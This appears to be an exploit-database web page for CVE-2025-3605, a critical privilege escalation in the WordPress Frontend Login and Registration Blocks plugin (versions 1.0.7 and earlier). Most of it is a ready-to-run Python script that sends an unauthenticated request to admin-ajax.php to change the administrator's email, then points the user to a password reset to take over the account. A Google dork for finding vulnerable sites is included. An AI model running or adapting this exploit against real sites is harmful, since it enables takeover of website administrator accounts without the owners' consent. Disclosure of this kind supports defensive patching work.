WordPress Frontend Login and Registration Blocks Plugin 1.0.7 – Privilege Escalation

May 13, 2025 invoker category_exploit

Exploit Details

Basic Information

Exploit Title WordPress Frontend Login and Registration Blocks Plugin 1.0.7 – Privilege Escalation
Exploit ID EDB-ID:52291
Type exploitdb
Published 2025-05-13T00:00:00
Modified 2025-05-13T00:00:00

CVSS Information

CVSS Score 9.8
Severity CRITICAL
Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE Information

  • CVE-2025-3605

Exploit Description

Exploit Title: WordPress Frontend Login and Registration Blocks Plugin 1.0.7…

Exploit Code

# Exploit Title: WordPress Frontend Login and Registration Blocks Plugin 1.0.7 – Privilege Escalation

# Google Dork: inurl:/wp-content/plugins/frontend-login-and-registration-blocks/

# Date: 2025-05-12

# Exploit Author: Md Shoriful Islam (RootHarpy)

# Vendor Homepage: https://wordpress.org/plugins/frontend-login-and-registration-blocks/

# Software Link: https://downloads.wordpress.org/plugin/frontend-login-and-registration-blocks.1.0.7.zip

# Version: <= 1.0.7
# Tested on: Ubuntu 22.04 + WordPress 6.5.2

# CVE : CVE-2025-3605

import requests

import argparse

import sys

def display_banner():

banner = “””

_____ _____ ___ __ ___ ___ ____ __ __ ___

/ __\ \ / / __|_|_ ) \_ ) __|__|__ / / / / \| __|

| (__ \ V /| _|___/ / () / /|__ \___|_ \/ _ \ () |__ \

\___| \_/ |___| /___\__/___|___/ |___/\___/\__/|___/

“””

print(banner)

def suppress_ssl_warnings():

requests.packages.urllib3.disable_warnings()

def initialize_session():

new_session = requests.Session()

new_session.verify = False

new_session.headers.update({‘User-Agent’: “Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36”})

return new_session

def parse_input_args():

parser = argparse.ArgumentParser(description=”Exploit for Privilege Escalation in Frontend Login and Registration Plugin <= 1.0.7")
parser.add_argument(“–target”, “-t”, required=True, help=”Target URL to exploit”)

parser.add_argument(“–target_user”, “-u”, default=”1″, help=”User ID for target (default: 1)”)

parser.add_argument(“–new_email”, “-e”, default=”[email protected]”, help=”Email to change to (default: [email protected])”)

return parser.parse_args()

def generate_payload(user, email):

return {

‘action’: ‘flrblocksusersettingsupdatehandle’,

‘user_id’: user,

‘flr-blocks-email-update’: email

}

def execute_exploit(session, target_url, payload):

try:

return session.post(f”{target_url}/wp-admin/admin-ajax.php”, data=payload)

except Exception as error:

print(f”Request error: {error}”)

sys.exit(1)

def process_response(response):

if response.status_code == 200 and response.text.strip() != “0”:

print(f”Exploit succeeded! Response: {response.text}”)

print(“Next: Go to the Forgot Password page and reset the admin password using the new email!”)

else:

print(f”Exploit failed. HTTP Status: {response.status_code}, Response: {response.text}”)

def run_exploit():

display_banner()

suppress_ssl_warnings()

args = parse_input_args()

session = initialize_session()

payload = generate_payload(args.target_user, args.new_email)

response = execute_exploit(session, args.target, payload)

process_response(response)

if __name__ == “__main__”:

run_exploit()

View Full Exploit Details

💭 Join the Security Discussion

🔒 Your email address will not be published. Required fields are marked *

⚠️ Please be respectful and constructive in your comments. Security discussions should remain professional.